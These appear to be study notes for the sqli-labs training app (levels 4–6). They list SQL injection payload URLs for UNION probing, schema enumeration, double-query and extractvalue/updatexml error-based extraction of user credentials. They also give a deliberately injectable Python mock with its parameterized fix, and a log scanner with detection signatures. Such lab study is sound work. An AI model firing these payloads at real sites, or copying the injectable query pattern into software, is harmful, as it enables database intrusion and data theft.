sqli-labs study notes (2)

0x04 less-4

I found another trick online for avoiding repeated use of LIMIT: use group_concat to list everything at once. Very handy when the amount of data is small!

Backend query

$id = '"' . $id . '"';   // raw user input is wrapped in double quotes, not escaped or bound
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";   // and spliced straight into the statement

Payloads

http://localhost/sqli-labs-master/Less-4/?id=1'   //no error from the server here: the backend uses double quotes, and a double-quoted string may contain a single quote, so the query still executes

http://localhost/sqli-labs-master/Less-4/?id=2"   //testing with a double quote raises an error

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,3-- +  //columns 2 and 3 are echoed

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,concat_ws(':',user(),database(),version())-- + //current user, current database, version

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479-- + 

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273-- +

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,concat_ws(':',id,username,password) from users limit 2,1-- +
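Added example (not code from the page or from sqli-labs): a small Python/SQLite mock of the Less-4 backend query beside its hardened form, showing that binding the id as a parameter is what stops the `0") union select ...` probe. SQLite treats a double-quoted token as an identifier first, so this mock wraps the input in single quotes instead (MySQL accepts either quote style, which is why the lab's double-quoted version is just as injectable); the probe is adapted accordingly to `0') union select 1,2,3-- +`. The users table and its rows are constructed sample data.

```python
import sqlite3

# Constructed sample table with the three columns the walkthrough echoes
# (id, username, password). Not the lab's real data.
SAMPLE_USERS = [(1, "user1", "pw1"), (2, "user2", "pw2")]

# Column-count probe from the walkthrough, with the quote adapted to this mock's
# single-quote wrapping (assumption: same shape as the Less-4 payload).
PAYLOAD = "0') union select 1,2,3-- +"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def fetch_user_vulnerable(conn, user_input):
    # Mirrors the Less-4 backend: wrap the raw input in quotes and splice it
    # into the statement. The sequence ') in the input closes both the string
    # and the parenthesis, so everything after it is executed as SQL and the
    # trailing LIMIT is commented out.
    id_expr = "'" + user_input + "'"
    sql = f"SELECT * FROM users WHERE id=({id_expr}) LIMIT 0,1"
    return conn.execute(sql).fetchall()


def fetch_user_safe(conn, user_input):
    # Hardened form: the input is bound as a parameter, so it is always a
    # value and never SQL text. Quotes, parentheses and comment markers in
    # it are inert; a non-numeric string simply matches no row.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_input,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(fetch_user_vulnerable(conn, "1"))      # legitimate lookup works in both
    print(fetch_user_vulnerable(conn, PAYLOAD))  # the injected UNION row comes back
    print(fetch_user_safe(conn, PAYLOAD))        # no row: the payload is just a string
```

The fix is the same in PHP: pass `$id` through a prepared statement (`mysqli_prepare`/`PDO::prepare` with a bound parameter) instead of concatenating it, and validate that it is an integer before the query is ever built.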

0x05 less-5

Starting from level five, the setup looks the same as level one, but the page only returns "you are in……".
Double-query injection, single-quote string type.

Prerequisites

count(): counts the number of rows (tuples)
rand(): returns a random number between 0 and 1
floor(): rounds down to the nearest integer
group by: used together with aggregate functions to group the result set by one or more columns

http://localhost/sqli-labs-master/Less-5/?id=1 union select 1,2,3-- +


http://localhost/sqli-labs-master/Less-5/?id=1' and (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)-- +
//returns the error Operand should contain 1 column(s), i.e. the subquery may only return one column

Note that because rand() is involved, sometimes no result is shown and the page needs to be refreshed.

http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a))-- +
//returns the error Every derived table must have its own alias: every derived table needs an alias of its own
http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from (select count(*),concat((select database()), '  ',floor(rand()*2)) as a from information_schema.columns group by a ) b)-- +
//obtains the database name


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//obtains the current connection user

http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//obtains the current version information


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//table name


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select concat_ws(':',id,username,password) from users where table_schema=database() limit 2,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//id/username/password

Besides this double-query method, there are other approaches to error-based SQL injection.
1. Using extractvalue
extractvalue(xml_frag,xpath_expr)
extractvalue() takes two string arguments: a fragment of XML markup xml_frag and an XPath expression xpath_expr (also called a locator). The function returns the text of the first text node. In MySQL 5.6.6 and earlier the XPath expression can contain at most 127 characters; this limit was removed in MySQL 5.6.7. The statement that fetches the information we want can be placed inside the XPath expression.

http://localhost/sqli-labs-master/Less-5/?id=1' and 1=extractvalue(1,concat(0x5e24,(select concat_ws(':',user(),database(),version()))))-- +

2. Using updatexml
updatexml(xml_target,xpath_expr,new_xml)
This function replaces a single portion of the given fragment of XML markup xml_target with a new XML fragment new_xml and returns the changed XML. The portion of xml_target that is replaced is the one matching the user-supplied XPath expression xpath_expr. In MySQL 5.6.6 and earlier the XPath expression can contain at most 127 characters; this limit was removed in MySQL 5.6.7. If no expression matching xpath_expr is found, or if multiple matches are found, the function returns the original xml_target fragment. All three arguments should be strings. The statement that fetches the information we want can be placed inside the XPath expression.
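Added example (not code from the page or from sqli-labs), written from the detection side: a scanner over constructed web-server access-log lines that URL-decodes each request's query string and flags the techniques shown in this walkthrough, i.e. UNION column probing, information_schema enumeration, the floor(rand()) + group by double query, and the extractvalue/updatexml error-based helpers. The log lines, client addresses and timestamps are constructed; the flagged requests reuse payload shapes already shown on this page, and the last line is a benign control that contains the words "union" and "select" without forming a query.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the techniques covered in this walkthrough. Keyed by a short
# label so a finding names what it matched. Matching is done on the decoded
# query string, so percent-encoding and '+' for space do not hide anything.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "double_query": re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample log (not real traffic). Lines 2-5 carry payload shapes
# from this walkthrough; line 6 is benign text that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /Less-4/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /Less-4/?id=0%22)%20union%20select%201,2,3--%20+ HTTP/1.1" 200 530
10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /Less-4/?id=0%22)%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479--%20+ HTTP/1.1" 200 540
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /Less-5/?id=1'%20and%20(select%201%20from(select%20count(*),concat(0x3a,0x3a,(select%20database()),0x3a,0x3a,floor(rand()*2))%20as%20a%20from%20information_schema.columns%20group%20by%20a)b)--%20+ HTTP/1.1" 500 300
10.0.0.5 - - [10/Oct/2023:13:56:10 +0000] "GET /Less-5/?id=1'%20and%201=extractvalue(1,concat(0x5e24,(select%20concat_ws(':',user(),database(),version()))))--%20+ HTTP/1.1" 500 310
10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /search?q=union+station+select+hotel HTTP/1.1" 200 900
"""


def extract_query(line):
    """Return the URL-decoded query string of a log line, or None if the line
    has no recognisable request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    return unquote_plus(urlsplit(m.group(1)).query)


def scan_log(text):
    """Return [(line_number, [matched_signature_labels])] for every line whose
    decoded query string matches at least one signature."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        query = extract_query(line)
        if query is None:
            continue
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Decoding before matching is the important step: the `-- +` terminator, `%20` and `%22` all arrive encoded, and a rule applied to the raw request line would miss the spaced-out `union select`. These string signatures are a first-pass alert, not proof of compromise; correlate the flagged lines with the 500 responses and the database error log (the Operand should contain 1 column(s) and derived-table-alias errors above are exactly what a probing session leaves behind).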

0x06 less-6

The single quote becomes a double quote; otherwise there is no difference from level five.

http://localhost/sqli-labs-master/Less-6/?id=1" and (select 1 from (select count(*),concat((select database()), '  ',floor(rand()*2)) as a from information_schema.columns group by a ) b)-- +

The rest is the same as level five.

I still don't quite understand the principle behind double-query injection; below I recommend an article on FreeBuf that explains it in fairly plain terms.
Link
